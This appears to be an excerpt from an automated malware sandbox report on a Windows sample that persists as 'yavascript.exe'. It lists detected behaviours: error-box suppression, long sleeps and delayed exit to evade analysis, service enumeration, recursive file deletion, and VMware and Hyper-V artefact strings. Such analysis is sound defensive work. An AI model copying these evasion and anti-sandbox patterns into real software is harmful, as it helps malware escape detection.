Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0040E54F Sleep,ExitProcess,	0_2_0040E54F
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0247E7B6 Sleep,ExitProcess,	0_2_0247E7B6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0040E54F Sleep,ExitProcess,	23_2_0040E54F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AEE7B6 Sleep,ExitProcess,	23_2_00AEE7B6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0040E54F Sleep,ExitProcess,	24_2_0040E54F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0251E7B6 Sleep,ExitProcess,	24_2_0251E7B6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0040E54F Sleep,ExitProcess,	35_2_0040E54F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024EE7B6 Sleep,ExitProcess,	35_2_024EE7B6

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	0_2_004198C2
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	0_2_02489B29
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	23_2_004198C2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	23_2_00AF9B29
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	24_2_004198C2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	24_2_02529B29
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	35_2_004198C2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	35_2_024F9B29

Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Window / User API: threadDelayed 4128
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Window / User API: threadDelayed 5798

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Evaded block: after key decision			graph_0-88897
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Evaded block: after key decision			graph_0-88923

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	API coverage: 3.5 %
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	API coverage: 5.6 %
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	API coverage: 3.3 %
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	API coverage: 3.2 %

Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe TID: 7972	Thread sleep count: 4128 > 30
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe TID: 7972	Thread sleep time: -12384000s >= -30000s
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe TID: 7972	Thread sleep count: 5798 > 30
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe TID: 7972	Thread sleep time: -17394000s >= -30000s

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	0_2_0040B335
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	0_2_0041B42F
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	0_2_0040B53A
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0044D5E9 FindFirstFileExA,	0_2_0044D5E9
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	0_2_004089A9
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00406AC2 FindFirstFileW,FindNextFileW,	0_2_00406AC2
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	0_2_00407A8C
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	0_2_00418C69
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	0_2_00408DA7
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0247900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_0247900E
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0248B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	0_2_0248B696
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0247B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	0_2_0247B59C
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024BD850 FindFirstFileExA,	0_2_024BD850
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_02488ED0 FindFirstFileW,	0_2_02488ED0
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_02477CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	0_2_02477CF3
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_02476D29 FindFirstFileW,FindNextFileW,	0_2_02476D29
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	23_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	23_2_0041B42F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	23_2_0040B53A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0044D5E9 FindFirstFileExA,	23_2_0044D5E9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	23_2_004089A9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00406AC2 FindFirstFileW,FindNextFileW,	23_2_00406AC2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	23_2_00407A8C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	23_2_00418C69
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	23_2_00408DA7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AE900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	23_2_00AE900E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AEB59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	23_2_00AEB59C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AFB696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	23_2_00AFB696
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B2D850 FindFirstFileExA,	23_2_00B2D850
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AE7CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	23_2_00AE7CF3
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AE6D29 FindFirstFileW,FindNextFileW,	23_2_00AE6D29
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AF8ED0 FindFirstFileW,	23_2_00AF8ED0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	24_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	24_2_0041B42F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	24_2_0040B53A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0044D5E9 FindFirstFileExA,	24_2_0044D5E9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	24_2_004089A9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00406AC2 FindFirstFileW,FindNextFileW,	24_2_00406AC2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	24_2_00407A8C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	24_2_00418C69
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	24_2_00408DA7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0251900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_0251900E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0252B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	24_2_0252B696
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0251B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	24_2_0251B59C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0255D850 FindFirstFileExA,	24_2_0255D850
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02528ED0 FindFirstFileW,	24_2_02528ED0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02517CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	24_2_02517CF3
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02516D29 FindFirstFileW,FindNextFileW,	24_2_02516D29
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	35_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	35_2_0041B42F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	35_2_0040B53A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0044D5E9 FindFirstFileExA,	35_2_0044D5E9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	35_2_004089A9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00406AC2 FindFirstFileW,FindNextFileW,	35_2_00406AC2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	35_2_00407A8C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	35_2_00418C69
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	35_2_00408DA7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024E900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	35_2_024E900E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024FB696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	35_2_024FB696
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024EB59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	35_2_024EB59C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0252D850 FindFirstFileExA,	35_2_0252D850
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024F8ED0 FindFirstFileW,	35_2_024F8ED0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024E7CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	35_2_024E7CF3
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024E6D29 FindFirstFileW,FindNextFileW,	35_2_024E6D29

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

0_2_00406F06

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: 2iH7rqx9rQ.exe, 00000000.00000002.1754239939.00000000008FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y v]v
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: yavascript.exe, 00000017.00000002.2515411294.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
